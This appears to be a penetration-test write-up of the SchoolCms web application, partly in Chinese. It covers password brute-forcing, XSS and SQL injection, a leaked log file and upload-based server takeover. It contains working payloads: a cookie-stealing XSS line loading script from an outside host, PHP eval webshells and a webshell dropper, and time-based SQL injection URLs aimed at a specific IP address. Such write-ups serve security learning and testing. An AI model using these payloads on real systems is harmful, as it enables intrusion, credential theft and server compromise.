Table of contents
SchoolCms Vulnerability Penetration Test
Site configuration --> site settings exist file upload point
Theme management ---> theme installation exists file upload
SchoolCms Vulnerability Penetration Test
Site homepage:
collect message
Retrieve ip information, scan
nmap scan port
Information Gathering, Explosive Directory
Scan with Edgeworth
scan port
Through the blasted directory, we can find that there is a compressed package in the directory, we try to download
Available for download:
After downloading, open it and find that it is the source code of the website
1. Weak password blasting
Try to enter the background:
Enter the background and blast the password to blast the background password
First try to log in: try the admin account, the password is random
It means that the account exists, but the password is wrong.
Next, capture the packet by blasting the password and send the data information to Intruder
Use sniper mode. The user is determined, and the password is blasted.
Select password dictionary
After waiting, observe and find that different lengths are found, try whether it is a password
The password is correct, and the background password for successful login is lovelove
Two, XSS
Reflected XSS
In the background of student management, grade management, teacher management, article management, etc., there are xss cross-site scripting attacks. Take article management as an example, here is reflective XSS
In the article management office, I found that there is an xss to obtain cookie information
在交换框当中输入攻击语句
</tExtArEa>'"><sCRiPt sRC=//xss.yt/nFtJ></sCrIpT>
在xss平台查看动态
Copy the corresponding url and cookie information to see if you can jump back to the homepage of the website
After successful execution, successfully jump to the background of the website
Stored XSS
xss storage type
Front-end interface, a pop-up window appears
A pop-up window will appear for each corresponding column, and there is stored XSS
3. File upload vulnerability
Site configuration --> site settings exist file upload point
Method 1: Upload a file, verify whether it can be parsed, write a Trojan horse, and connect directly Method 2: Create a Trojan horse file, write a Trojan horse, and connect
Verify whether there is a file upload vulnerability and obtain the shell of the server
Next, we capture the packet and insert the php statement behind the picture to see if the server can parse it
Insert the php statement into the picture, and then put it in the package
Next, go to the file upload point, right-click to check, view the code, find the upload point of the file, and try accessing it
Next, we will access the link of this uploaded file. It is not difficult to find that the file we uploaded has become a .php file
After visiting the link, I found that the php statement in this file has been parsed
In the same way, we can replace the php test statement with a php one-sentence Trojan horse, and directly use Ant Sword to connect
Capture the packet to get the data, and write the php one-word Trojan horse into the picture code
Add a word Trojan horse
In the same way, find the corresponding link for file upload, and then visit
Open the hackbar and execute the php statement to see if it can be parsed
Connect via Ant Sword
Successfully got the server shell
方式二,在文件上传的目录下,去创建一个木马文件,并写入木马,相同的原理,之不过就是在图片码的后面,加上一句php创建并写入文件的语句
<?php fwrite(fopen("shell.php","w"),'<?php @eval($_POST["lc"]);?>');?>
方法同以上一致,依旧抓包获取数据,将以上的语句插入到图片码当中去
After packing, visit again
We guess that the php statement has been executed, and then check it out
Access the file under the upload path to check whether the file is created successfully.
Try to switch to the file we created to access, whether the input php statement can be parsed
Successfully parsed, connected via Godzilla, connected successfully
Successfully got the server shell
You can view all the contents under the server directory, and you can perform a series of operations such as adding, modifying and deleting!
Theme management ---> theme installation exists file upload
Try to upload zip file
After analysis, a picture and a php Trojan file are integrated into a folder, named shell_Html, and then packed and compressed.
Next to upload:
Capture the packet to obtain the data packet information, modify the data packet, modify the type to zip, and then release the packet
Verify whether the upload is successful, check the upload point
According to the analysis of the source code, the compressed package upload will be decompressed. After decompression, the folder will be disassembled and then spliced into files. The spliced file is the original name of the XX+ file in the folder (XX_Html) name. Here is shell_Html. So the file names are changed to shellcmd.php and shellshell.png
Through observation, we can know that the path of theme upload is Application\Home\View\ Try to access the file Application\Home\View\shellcmd.php in the newly uploaded folder to see if it can be parsed
The php statement was parsed successfully
Use a third-party tool, Ant Sword or Godzilla to connect and get the shell
Successfully obtained the server shell
Successfully obtained the shell of the server, and the connection was successful
Go back to the server to check the verification:
Successfully uploaded and successfully obtained permissions.
4. Log Leakage
通过尝试验证,发现日志泄露
url地址:
http://43.143.169.215/Application/Runtime/Logs/Home/23_05_23.log ---跟日期 年份_月份_日期.log
访问过后,成功回显。并下载
View the downloaded log content
5. SQL Injection
通过尝试,结果观察,发现后台存在sql注入点
注入点:
index.php?m=Admin&c=Article&a=SaveInfo
注入语句:
index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+
访问:
http://43.143.169.215/index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+
Displayed after a delay:
Capture the packet to see its changes:
Normally:
After injection:
success delay
The second injection point:
http://ip/schoolcms/index.php?m=Admin&c=Article&a=Index
此次存在sql注入,执行删除操作时进行抓包查看其变化
注入点:
http://ip/schoolcms/index.php?m=Admin&c=Article&a=Delete的数据包当中,
在数据包修改原始数据
添加id[where]=id=1+or+sleep(5)
Perform deletion operations, observe changes in url information, capture packets to capture data information, modify data packets, and try sql injection.
Under normal circumstances:
After injection:
The delay time in sleep() is arbitrary.
After modification, release the package to observe its changes
success delay
After decoding:
If the article is inappropriate, criticism and correction are welcome!